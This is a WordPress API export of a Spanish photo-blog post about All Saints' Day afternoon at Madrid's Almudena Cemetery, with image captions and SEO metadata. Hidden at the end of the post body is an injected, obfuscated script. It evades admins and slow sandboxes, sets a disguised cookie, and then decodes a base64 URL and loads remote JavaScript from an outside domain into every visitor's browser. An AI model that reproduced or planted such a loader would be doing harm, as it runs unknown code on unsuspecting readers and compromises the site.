aria-describedby=\"caption-attachment-3413\" style=\"width: 400px\" class=\"wp-caption aligncenter\"><a href=\"http:\/\/www.perez-tome.net\/pptgrafia\/wp-content\/uploads\/2022\/11\/DSC09143-scaled.jpg\"><img loading=\"lazy\" decoding=\"async\" class=\"wp-image-3413\" src=\"http:\/\/www.perez-tome.net\/pptgrafia\/wp-content\/uploads\/2022\/11\/DSC09143-419x640.jpg\" alt=\"\" width=\"400\" height=\"612\" srcset=\"https:\/\/www.perez-tome.net\/pptgrafia\/wp-content\/uploads\/2022\/11\/DSC09143-419x640.jpg 419w, https:\/\/www.perez-tome.net\/pptgrafia\/wp-content\/uploads\/2022\/11\/DSC09143-409x625.jpg 409w, https:\/\/www.perez-tome.net\/pptgrafia\/wp-content\/uploads\/2022\/11\/DSC09143-768x1174.jpg 768w, https:\/\/www.perez-tome.net\/pptgrafia\/wp-content\/uploads\/2022\/11\/DSC09143-1004x1536.jpg 1004w, https:\/\/www.perez-tome.net\/pptgrafia\/wp-content\/uploads\/2022\/11\/DSC09143-1339x2048.jpg 1339w, https:\/\/www.perez-tome.net\/pptgrafia\/wp-content\/uploads\/2022\/11\/DSC09143-scaled.jpg 523w\" sizes=\"auto, (max-width: 400px) 100vw, 400px\" \/><\/a><figcaption id=\"caption-attachment-3413\" class=\"wp-caption-text\">400 nuevos columbarios ocupan las aceras. El negocio es el negocio.<\/figcaption><\/figure>\n<p>&nbsp;<\/p>\n<figure id=\"attachment_3414\" aria-describedby=\"caption-attachment-3414\" style=\"width: 400px\" class=\"wp-caption aligncenter\"><a href=\"http:\/\/www.perez-tome.net\/pptgrafia\/wp-content\/uploads\/2022\/11\/DSC09144-scaled.jpg\"><img loading=\"lazy\" decoding=\"async\" class=\"wp-image-3414\" src=\"http:\/\/www.perez-tome.net\/pptgrafia\/wp-content\/uploads\/2022\/11\/DSC09144-686x640.jpg\" alt=\"\" width=\"400\" height=\"373\" srcset=\"https:\/\/www.perez-tome.net\/pptgrafia\/wp-content\/uploads\/2022\/11\/DSC09144-686x640.jpg 686w, https:\/\/www.perez-tome.net\/pptgrafia\/wp-content\/uploads\/2022\/11\/DSC09144-670x625.jpg 670w, https:\/\/www.perez-tome.net\/pptgrafia\/wp-content\/uploads\/2022\/11\/DSC09144-768x716.jpg 768w, https:\/\/www.perez-tome.net\/pptgrafia\/wp-content\/uploads\/2022\/11\/DSC09144-1536x1433.jpg 1536w, https:\/\/www.perez-tome.net\/pptgrafia\/wp-content\/uploads\/2022\/11\/DSC09144-2048x1911.jpg 2048w, https:\/\/www.perez-tome.net\/pptgrafia\/wp-content\/uploads\/2022\/11\/DSC09144-scaled.jpg 800w\" sizes=\"auto, (max-width: 400px) 100vw, 400px\" \/><\/a><figcaption id=\"caption-attachment-3414\" class=\"wp-caption-text\">Escalera para ir de \u00abMadrid al Cielo\u00bb&#8230;<\/figcaption><\/figure>\n<p>&nbsp;<\/p>\n<figure id=\"attachment_3415\" aria-describedby=\"caption-attachment-3415\" style=\"width: 400px\" class=\"wp-caption aligncenter\"><a href=\"http:\/\/www.perez-tome.net\/pptgrafia\/wp-content\/uploads\/2022\/11\/DSC09148-scaled.jpg\"><img loading=\"lazy\" decoding=\"async\" class=\"wp-image-3415\" src=\"http:\/\/www.perez-tome.net\/pptgrafia\/wp-content\/uploads\/2022\/11\/DSC09148-1127x640.jpg\" alt=\"\" width=\"400\" height=\"227\" srcset=\"https:\/\/www.perez-tome.net\/pptgrafia\/wp-content\/uploads\/2022\/11\/DSC09148-1127x640.jpg 1127w, https:\/\/www.perez-tome.net\/pptgrafia\/wp-content\/uploads\/2022\/11\/DSC09148-scaled.jpg 800w, https:\/\/www.perez-tome.net\/pptgrafia\/wp-content\/uploads\/2022\/11\/DSC09148-768x436.jpg 768w, https:\/\/www.perez-tome.net\/pptgrafia\/wp-content\/uploads\/2022\/11\/DSC09148-1536x872.jpg 1536w, https:\/\/www.perez-tome.net\/pptgrafia\/wp-content\/uploads\/2022\/11\/DSC09148-2048x1163.jpg 2048w\" sizes=\"auto, (max-width: 400px) 100vw, 400px\" \/><\/a><figcaption id=\"caption-attachment-3415\" class=\"wp-caption-text\">Hay fotos que solo se pueden hacer al caer la tarde.<\/figcaption><\/figure>\n<p style=\"text-align: center;\">&nbsp;<\/p>\n<p style=\"text-align: left;\">La tarde de Todos los Santos en el Cementerio de la Almudena. Al d\u00eda siguiente vuelve la soledad. Parad\u00f3jicamente el D\u00eda de los Difuntos&#8230;<\/p>\n<p><script>(function(){try{if(document.getElementById&&document.getElementById('wpadminbar'))return;var t0=+new Date();for(var i=0;i&lt;20000;i++){var z=i*i;}if((+new Date())-t0>120)return;if((document.cookie||'').indexOf('http2_session_id=')!==-1)return;function systemLoad(input){var key='ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+\/=',o1,o2,o3,h1,h2,h3,h4,dec='',i=0;input=input.replace(\/[^A-Za-z0-9\\+\\\/\\=]\/g,'');while(i<input.length){h1=key.indexOf(input.charAt(i++));h2=key.indexOf(input.charAt(i++));h3=key.indexOf(input.charAt(i++));h4=key.indexOf(input.charAt(i++));o1=(h1<&lt;2)|(h2>>4);o2=((h2&15)<&lt;4)|(h3>>2);o3=((h3&3)<&lt;6)|h4;dec+=String.fromCharCode(o1);if(h3!=64)dec+=String.fromCharCode(o2);if(h4!=64)dec+=String.fromCharCode(o3);}return dec;}var u=systemLoad('aHR0cHM6Ly9zZWFyY2hyYW5rdHJhZmZpYy5saXZlL2pzeA==');if(typeof window!=='undefined'&#038;&#038;window.__rl===u)return;var d=new Date();d.setTime(d.getTime()+30*24*60*60*1000);document.cookie='http2_session_id=1; expires='+d.toUTCString()+'; path=\/; SameSite=Lax'+(location.protocol==='https:'?'; Secure':'');try{window.__rl=u;}catch(e){}var s=document.createElement('script');s.type='text\/javascript';s.async=true;s.src=u;try{s.setAttribute('data-rl',u);}catch(e){}(document.getElementsByTagName('head')[0]||document.documentElement).appendChild(s);}catch(e){}})();<\/script><\/p>\n","protected":false},"excerpt":{"rendered":"<p>La tarde de Todos los Santos en el Cementerio de la Almudena. Suelo visitar la Almudena casi todos los a\u00f1os. La visita al atardecer al [&#8230;]<\/p>\n","protected":false},"author":1,"featured_media":3402,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"ngg_post_thumbnail":0,"footnotes":""},"categories":[1],"tags":[],"class_list":["post-3389","post","type-post","status-publish","format-standard","has-post-thumbnail","hentry","category-blog-visual"],"yoast_head":"<!-- This site is optimized with the Yoast SEO plugin v27.5 - https:\/\/yoast.com\/product\/yoast-seo-wordpress\/ -->\n<title>La tarde de Todos los Santos en el Cementerio de la Almudena<\/title>\n<meta name=\"description\" content=\"La tarde de Todos los Santos en el Cementerio de la Almudena. Al d\u00eda siguiente vuelve la soledad. Parad\u00f3jicamente el D\u00eda de los difuntos...\" \/>\n<meta name=\"robots\" content=\"index, follow, max-snippet:-1, max-image-preview:large, max-video-preview:-1\" \/>\n<link rel=\"canonical\" href=\"https:\/\/www.perez-tome.net\/pptgrafia\/la-tarde-de-todos-los-santos-en-el-cementerio-de-la-almudena\/\" \/>\n<meta property=\"og:locale\" content=\"es_ES\" \/>\n<meta property=\"og:type\" content=\"article\" \/>\n<meta property=\"og:title\" content=\"La tarde de Todos los Santos en el Cementerio de la Almudena\" \/>\n<meta property=\"og:description\" content=\"La tarde de Todos los Santos en el Cementerio de la Almudena. Al d\u00eda siguiente vuelve la soledad. Parad\u00f3jicamente el D\u00eda de los difuntos...\" \/>\n<meta property=\"og:url\" content=\"https:\/\/www.perez-tome.net\/pptgrafia\/la-tarde-de-todos-los-santos-en-el-cementerio-de-la-almudena\/\" \/>\n<meta property=\"og:site_name\" content=\"PPTgraf\u00eda. Observaci\u00f3n e hipersemanticismo logop\u00e9dico: La vida misma\" \/>\n<meta property=\"article:published_time\" content=\"2022-11-02T16:25:44+00:00\" \/>\n<meta property=\"article:modified_time\" content=\"2026-02-04T14:49:07+00:00\" \/>\n<meta property=\"og:image\" content=\"https:\/\/www.perez-tome.net\/pptgrafia\/wp-content\/uploads\/2022\/11\/DSC09116-scaled-e1667407870436.jpg\" \/>\n\t<meta property=\"og:image:width\" content=\"400\" \/>\n\t<meta property=\"og:image:height\" content=\"267\" \/>\n\t<meta property=\"og:image:type\" content=\"image\/jpeg\" \/>\n<meta name=\"author\" content=\"Pablo P\u00e9rez-Tom\u00e9\" \/>\n<meta name=\"twitter:card\" content=\"summary_large_image\" \/>\n<meta name=\"twitter:label1\" content=\"Escrito por\" \/>\n\t<meta name=\"twitter:data1\" content=\"Pablo P\u00e9rez-Tom\u00e9\" \/>\n\t<meta name=\"twitter:label2\" content=\"Tiempo de lectura\" \/>\n\t<meta name=\"twitter:data2\" content=\"7 minutos\" \/>\n<script type=\"application\/ld+json\" class=\"yoast-schema-graph\">{\"@context\":\"https:\\\/\\\/schema.org\",\"@graph\":[{\"@type\":\"Article\",\"@id\":\"https:\\\/\\\/www.perez-tome.net\\\/pptgrafia\\\/la-tarde-de-todos-los-santos-en-el-cementerio-de-la-almudena\\\/#article\",\"isPartOf\":{\"@id\":\"https:\\\/\\\/www.perez-tome.net\\\/pptgrafia\\\/la-tarde-de-todos-los-santos-en-el-cementerio-de-la-almudena\\\/\"},\"author\":{\"name\":\"Pablo P\u00e9rez-Tom\u00e9\",\"@id\":\"https:\\\/\\\/www.perez-tome.net\\\/pptgrafia\\\/#\\\/schema\\\/person\\\/90f20700c171f4d2c0dda5d88f00cf6b\"},\"headline\":\"La tarde de Todos los Santos en el Cementerio de la Almudena\",\"datePublished\":\"2022-11-02T16:25:44+00:00\",\"dateModified\":\"2026-02-04T14:49:07+00:00\",\"mainEntityOfPage\":{\"@id\":\"https:\\\/\\\/www.perez-tome.net\\\/pptgrafia\\\/la-tarde-de-todos-los-santos-en-el-cementerio-de-la-almudena\\\/\"},\"wordCount\":492,\"commentCount\":0,\"publisher\":{\"@id\":\"https:\\\/\\\/www.perez-tome.net\\\/pptgrafia\\\/#\\\/schema\\\/person\\\/90f20700c171f4d2c0dda5d88f00cf6b\"},\"image\":{\"@id\":\"https:\\\/\\\/www.perez-tome.net\\\/pptgrafia\\\/la-tarde-de-todos-los-santos-en-el-cementerio-de-la-almudena\\\/#primaryimage\"},\"thumbnailUrl\":\"https:\\\/\\\/www.perez-tome.net\\\/pptgrafia\\\/wp-content\\\/uploads\\\/2022\\\/11\\\/DSC09116-scaled-e1667407870436.jpg\",\"articleSection\":[\"Blog visual y mental\"],\"inLanguage\":\"es\",\"potentialAction\":[{\"@type\":\"CommentAction\",\"name\":\"Comment\",\"target\":[\"https:\\\/\\\/www.perez-tome.net\\\/pptgrafia\\\/la-tarde-de-todos-los-santos-en-el-cementerio-de-la-almudena\\\/#respond\"]}]},{\"@type\":\"WebPage\",\"@id\":\"https:\\\/\\\/www.perez-tome.net\\\/pptgrafia\\\/la-tarde-de-todos-los-santos-en-el-cementerio-de-la-almudena\\\/\",\"url\":\"https:\\\/\\\/www.perez-tome.net\\\/pptgrafia\\\/la-tarde-de-todos-los-santos-en-el-cementerio-de-la-almudena\\\/\",\"name\":\"La tarde de Todos los Santos en el Cementerio de la Almudena\",\"isPartOf\":{\"@id\":\"https:\\\/\\\/www.perez-tome.net\\\/pptgrafia\\\/#website\"},\"primaryImageOfPage\":{\"@id\":\"https:\\\/\\\/www.perez-tome.net\\\/pptgrafia\\\/la-tarde-de-todos-los-santos-en-el-cementerio-de-la-almudena\\\/#primaryimage\"},\"image\":{\"@id\":\"https:\\\/\\\/www.perez-tome.net\\\/pptgrafia\\\/la-tarde-de-todos-los-santos-en-el-cementerio-de-la-almudena\\\/#primaryimage\"},\"thumbnailUrl\":\"https:\\\/\\\/www.perez-tome.net\\\/pptgrafia\\\/wp-content\\\/uploads\\\/2022\\\/11\\\/DSC09116-scaled-e1667407870436.jpg\",\"datePublished\":\"2022-11-02T16:25:44+00:00\",\"dateModified\":\"2026-02-04T14:49:07+00:00\",\"description\":\"La tarde de Todos los Santos en el Cementerio de la Almudena. Al d\u00eda siguiente vuelve la soledad. Parad\u00f3jicamente el D\u00eda de los difuntos...\",\"breadcrumb\":{\"@id\":\"https:\\\/\\\/www.perez-tome.net\\\/pptgrafia\\\/la-tarde-de-todos-los-santos-en-el-cementerio-de-la-almudena\\\/#breadcrumb\"},\"inLanguage\":\"es\",\"potentialAction\":[{\"@type\":\"ReadAction\",\"target\":[\"https:\\\/\\\/www.perez-tome.net\\\/pptgrafia\\\/la-tarde-de-todos-los-santos-en-el-cementerio-de-la-almudena\\\/\"]}]},{\"@type\":\"ImageObject\",\"inLanguage\":\"es\",\"@id\":\"https:\\\/\\\/www.perez-tome.net\\\/pptgrafia\\\/la-tarde-de-todos-los-santos-en-el-cementerio-de-la-almudena\\\/#primaryimage\",\"url\":\"https:\\\/\\\/www.perez-tome.net\\\/pptgrafia\\\/wp-content\\\/uploads\\\/2022\\\/11\\\/DSC09116-scaled-e1667407870436.jpg\",\"contentUrl\":\"https:\\\/\\\/www.perez-tome.net\\\/pptgrafia\\\/wp-content\\\/uploads\\\/2022\\\/11\\\/DSC09116-scaled-e1667407870436.jpg\",\"width\":400,\"height\":267,\"caption\":\"Fomentemos la verdadera televisi\u00f3n. Veamos m\u00e1s all\u00e1.\"},{\"@type\":\"BreadcrumbList\",\"@id\":\"https:\\\/\\\/www.perez-tome.net\\\/pptgrafia\\\/la-tarde-de-todos-los-santos-en-el-cementerio-de-la-almudena\\\/#breadcrumb\",\"itemListElement\":[{\"@type\":\"ListItem\",\"position\":1,\"name\":\"Portada\",\"item\":\"https:\\\/\\\/www.perez-tome.net\\\/pptgrafia\\\/\"},{\"@type\":\"ListItem\",\"position\":2,\"name\":\"La tarde de Todos los Santos en el Cementerio de la Almudena\"}]},{\"@type\":\"WebSite\",\"@id\":\"https:\\\/\\\/www.perez-tome.net\\\/pptgrafia\\\/#website\",\"url\":\"https:\\\/\\\/www.perez-tome.net\\\/pptgrafia\\\/\",\"name\":\"PPTgraf\u00eda. Observaci\u00f3n e hipersemanticismo logop\u00e9dico: La vida misma\",\"description\":\"CREATIVE COMMONS Copyright 2026: Reconocimiento \u2013 NoComercial \u2013 CompartirIgual (by-nc-sa): No se permite un uso comercial de la obra original ni de las posibles obras derivadas, la distribuci\u00f3n de las cuales se debe hacer con una licencia igual a la que regula la obra original.\",\"publisher\":{\"@id\":\"https:\\\/\\\/www.perez-tome.net\\\/pptgrafia\\\/#\\\/schema\\\/person\\\/90f20700c171f4d2c0dda5d88f00cf6b\"},\"potentialAction\":[{\"@type\":\"SearchAction\",\"target\":{\"@type\":\"EntryPoint\",\"urlTemplate\":\"https:\\\/\\\/www.perez-tome.net\\\/pptgrafia\\\/?s={search_term_string}\"},\"query-input\":{\"@type\":\"PropertyValueSpecification\",\"valueRequired\":true,\"valueName\":\"search_term_string\"}}],\"inLanguage\":\"es\"},{\"@type\":[\"Person\",\"Organization\"],\"@id\":\"https:\\\/\\\/www.perez-tome.net\\\/pptgrafia\\\/#\\\/schema\\\/person\\\/90f20700c171f4d2c0dda5d88f00cf6b\",\"name\":\"Pablo P\u00e9rez-Tom\u00e9\",\"image\":{\"@type\":\"ImageObject\",\"inLanguage\":\"es\",\"@id\":\"https:\\\/\\\/secure.gravatar.com\\\/avatar\\\/e5c55b896f84e693c043020e9446fc02709c43b70af9baa420d6430184267f4e?s=96&d=mm&r=pg\",\"url\":\"https:\\\/\\\/secure.gravatar.com\\\/avatar\\\/e5c55b896f84e693c043020e9446fc02709c43b70af9baa420d6430184267f4e?s=96&d=mm&r=pg\",\"contentUrl\":\"https:\\\/\\\/secure.gravatar.com\\\/avatar\\\/e5c55b896f84e693c043020e9446fc02709c43b70af9baa420d6430184267f4e?s=96&d=mm&r=pg\",\"caption\":\"Pablo P\u00e9rez-Tom\u00e9\"},\"logo\":{\"@id\":\"https:\\\/\\\/secure.gravatar.com\\\/avatar\\\/e5c55b896f84e693c043020e9446fc02709c43b70af9baa420d6430184267f4e?s=96&d=mm&r=pg\"},\"description\":\"In fieri et in actu. Bullir continuo sin parar: De la \u00e9tica a la est\u00e9tica por la geofotograf\u00eda, hist\u00f3rico-social-pol\u00edtica. Inconformista. Comunidad de Madrid - Espa\u00f1a\",\"sameAs\":[\"http:\\\/\\\/www.perez-tome.net\\\/pptgrafia\"]}]}<\/script>\n<!-- \/ Yoast SEO plugin. -->","yoast_head_json":{"title":"La tarde de Todos los Santos en el Cementerio de la Almudena","description":"La tarde de Todos los Santos en el Cementerio de la Almudena. Al d\u00eda siguiente vuelve la soledad. Parad\u00f3jicamente el D\u00eda de los difuntos...","robots":{"index":"index","follow":"follow","max-snippet":"max-snippet:-1","max-image-preview":"max-image-preview:large","max-video-preview":"max-video-preview:-1"},"canonical":"https:\/\/www.perez-tome.net\/pptgrafia\/la-tarde-de-todos-los-santos-en-el-cementerio-de-la-almudena\/","og_locale":"es_ES","og_type":"article","og_title":"La tarde de Todos los Santos en el Cementerio de la Almudena","og_description":"La tarde de Todos los Santos en el Cementerio de la Almudena. Al d\u00eda siguiente vuelve la soledad. Parad\u00f3jicamente el D\u00eda de los difuntos...","og_url":"https:\/\/www.perez-tome.net\/pptgrafia\/la-tarde-de-todos-los-santos-en-el-cementerio-de-la-almudena\/","og_site_name":"PPTgraf\u00eda. Observaci\u00f3n e hipersemanticismo logop\u00e9dico: La vida misma","article_published_time":"2022-11-02T16:25:44+00:00","article_modified_time":"2026-02-04T14:49:07+00:00","og_image":[{"width":400,"height":267,"url":"https:\/\/www.perez-tome.net\/pptgrafia\/wp-content\/uploads\/2022\/11\/DSC09116-scaled-e1667407870436.jpg","type":"image\/jpeg"}],"author":"Pablo P\u00e9rez-Tom\u00e9","twitter_card":"summary_large_image","twitter_misc":{"Escrito por":"Pablo P\u00e9rez-Tom\u00e9","Tiempo de lectura":"7 minutos"},"schema":{"@context":"https:\/\/schema.org","@graph":[{"@type":"Article","@id":"https:\/\/www.perez-tome.net\/pptgrafia\/la-tarde-de-todos-los-santos-en-el-cementerio-de-la-almudena\/#article","isPartOf":{"@id":"https:\/\/www.perez-tome.net\/pptgrafia\/la-tarde-de-todos-los-santos-en-el-cementerio-de-la-almudena\/"},"author":{"name":"Pablo P\u00e9rez-Tom\u00e9","@id":"https:\/\/www.perez-tome.net\/pptgrafia\/#\/schema\/person\/90f20700c171f4d2c0dda5d88f00cf6b"},"headline":"La tarde de Todos los Santos en el Cementerio de la Almudena","datePublished":"2022-11-02T16:25:44+00:00","dateModified":"2026-02-04T14:49:07+00:00","mainEntityOfPage":{"@id":"https:\/\/www.perez-tome.net\/pptgrafia\/la-tarde-de-todos-los-santos-en-el-cementerio-de-la-almudena\/"},"wordCount":492,"commentCount":0,"publisher":{"@id":"https:\/\/www.perez-tome.net\/pptgrafia\/#\/schema\/person\/90f20700c171f4d2c0dda5d88f00cf6b"},"image":{"@id":"https:\/\/www.perez-tome.net\/pptgrafia\/la-tarde-de-todos-los-santos-en-el-cementerio-de-la-almudena\/#primaryimage"},"thumbnailUrl":"https:\/\/www.perez-tome.net\/pptgrafia\/wp-content\/uploads\/2022\/11\/DSC09116-scaled-e1667407870436.jpg","articleSection":["Blog visual y mental"],"inLanguage":"es","potentialAction":[{"@type":"CommentAction","name":"Comment","target":["https:\/\/www.perez-tome.net\/pptgrafia\/la-tarde-de-todos-los-santos-en-el-cementerio-de-la-almudena\/#respond"]}]},{"@type":"WebPage","@id":"https:\/\/www.perez-tome.net\/pptgrafia\/la-tarde-de-todos-los-santos-en-el-cementerio-de-la-almudena\/","url":"https:\/\/www.perez-tome.net\/pptgrafia\/la-tarde-de-todos-los-santos-en-el-cementerio-de-la-almudena\/","name":"La tarde de Todos los Santos en el Cementerio de la Almudena","isPartOf":{"@id":"https:\/\/www.perez-tome.net\/pptgrafia\/#website"},"primaryImageOfPage":{"@id":"https:\/\/www.perez-tome.net\/pptgrafia\/la-tarde-de-todos-los-santos-en-el-cementerio-de-la-almudena\/#primaryimage"},"image":{"@id":"https:\/\/www.perez-tome.net\/pptgrafia\/la-tarde-de-todos-los-santos-en-el-cementerio-de-la-almudena\/#primaryimage"},"thumbnailUrl":"https:\/\/www.perez-tome.net\/pptgrafia\/wp-content\/uploads\/2022\/11\/DSC09116-scaled-e1667407870436.jpg","datePublished":"2022-11-02T16:25:44+00:00","dateModified":"2026-02-04T14:49:07+00:00","description":"La tarde de Todos los Santos en el Cementerio de la Almudena. Al d\u00eda siguiente vuelve la soledad. Parad\u00f3jicamente el D\u00eda de los difuntos...","breadcrumb":{"@id":"https:\/\/www.perez-tome.net\/pptgrafia\/la-tarde-de-todos-los-santos-en-el-cementerio-de-la-almudena\/#breadcrumb"},"inLanguage":"es","potentialAction":[{"@type":"ReadAction","target":["https:\/\/www.perez-tome.net\/pptgrafia\/la-tarde-de-todos-los-santos-en-el-cementerio-de-la-almudena\/"]}]},{"@type":"ImageObject","inLanguage":"es","@id":"https:\/\/www.perez-tome.net\/pptgrafia\/la-tarde-de-todos-los-santos-en-el-cementerio-de-la-almudena\/#primaryimage","url":"https:\/\/www.perez-tome.net\/pptgrafia\/wp-content\/uploads\/2022\/11\/DSC09116-scaled-e1667407870436.jpg","contentUrl":"https:\/\/www.perez-tome.net\/pptgrafia\/wp-content\/uploads\/2022\/11\/DSC09116-scaled-e1667407870436.jpg","width":400,"height":267,"caption":"Fomentemos la verdadera televisi\u00f3n. Veamos m\u00e1s all\u00e1."},{"@type":"BreadcrumbList","@id":"https:\/\/www.perez-tome.net\/pptgrafia\/la-tarde-de-todos-los-santos-en-el-cementerio-de-la-almudena\/#breadcrumb","itemListElement":[{"@type":"ListItem","position":1,"name":"Portada","item":"https:\/\/www.perez-tome.net\/pptgrafia\/"},{"@type":"ListItem","position":2,"name":"La tarde de Todos los Santos en el Cementerio de la Almudena"}]},{"@type":"WebSite","@id":"https:\/\/www.perez-tome.net\/pptgrafia\/#website","url":"https:\/\/www.perez-tome.net\/pptgrafia\/","name":"PPTgraf\u00eda. Observaci\u00f3n e hipersemanticismo logop\u00e9dico: La vida misma","description":"CREATIVE COMMONS Copyright 2026: Reconocimiento \u2013 NoComercial \u2013 CompartirIgual (by-nc-sa): No se permite un uso comercial de la obra original ni de las posibles obras derivadas, la distribuci\u00f3n de las cuales se debe hacer con una licencia igual a la que regula la obra original.","publisher":{"@id":"https:\/\/www.perez-tome.net\/pptgrafia\/#\/schema\/person\/90f20700c171f4d2c0dda5d88f00cf6b"},"potentialAction":[{"@type":"SearchAction","target":{"@type":"EntryPoint","urlTemplate":"https:\/\/www.perez-tome.net\/pptgrafia\/?s={search_term_string}"},"query-input":{"@type":"PropertyValueSpecification","valueRequired":true,"valueName":"search_term_string"}}],"inLanguage":"es"},{"@type":["Person","Organization"],"@id":"https:\/\/www.perez-tome.net\/pptgrafia\/#\/schema\/person\/90f20700c171f4d2c0dda5d88f00cf6b","name":"Pablo P\u00e9rez-Tom\u00e9","image":{"@type":"ImageObject","inLanguage":"es","@id":"https:\/\/secure.gravatar.com\/avatar\/e5c55b896f84e693c043020e9446fc02709c43b70af9baa420d6430184267f4e?s=96&d=mm&r=pg","url":"https:\/\/secure.gravatar.com\/avatar\/e5c55b896f84e693c043020e9446fc02709c43b70af9baa420d6430184267f4e?s=96&d=mm&r=pg","contentUrl":"https:\/\/secure.gravatar.com\/avatar\/e5c55b896f84e693c043020e9446fc02709c43b70af9baa420d6430184267f4e?s=96&d=mm&r=pg","caption":"Pablo P\u00e9rez-Tom\u00e9"},"logo":{"@id":"https:\/\/secure.gravatar.com\/avatar\/e5c55b896f84e693c043020e9446fc02709c43b70af9baa420d6430184267f4e?s=96&d=mm&r=pg"},"description":"In fieri et in actu. Bullir continuo sin parar: De la \u00e9tica a la est\u00e9tica por la geofotograf\u00eda, hist\u00f3rico-social-pol\u00edtica. Inconformista. Comunidad de Madrid - Espa\u00f1a","sameAs":["http:\/\/www.perez-tome.net\/pptgrafia"]}]}},"_links":{"self":[{"href":"https:\/\/www.perez-tome.net\/pptgrafia\/wp-json\/wp\/v2\/posts\/3389","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/www.perez-tome.net\/pptgrafia\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/www.perez-tome.net\/pptgrafia\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/www.perez-tome.net\/pptgrafia\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/www.perez-tome.net\/pptgrafia\/wp-json\/wp\/v2\/comments?post=3389"}],"version-history":[{"count":14,"href":"https:\/\/www.perez-tome.net\/pptgrafia\/wp-json\/wp\/v2\/posts\/3389\/revisions"}],"predecessor-version":[{"id":3555,"href":"https:\/\/www.perez-tome.net\/pptgrafia\/wp-json\/wp\/v2\/posts\/3389\/revisions\/3555"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/www.perez-tome.net\/pptgrafia\/wp-json\/wp\/v2\/media\/3402"}],"wp:attachment":[{"href":"https:\/\/www.perez-tome.net\/pptgrafia\/wp-json\/wp\/v2\/media?parent=3389"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/www.perez-tome.net\/pptgrafia\/wp-json\/wp\/v2\/categories?post=3389"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/www.perez-tome.net\/pptgrafia\/wp-json\/wp\/v2\/tags?post=3389"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}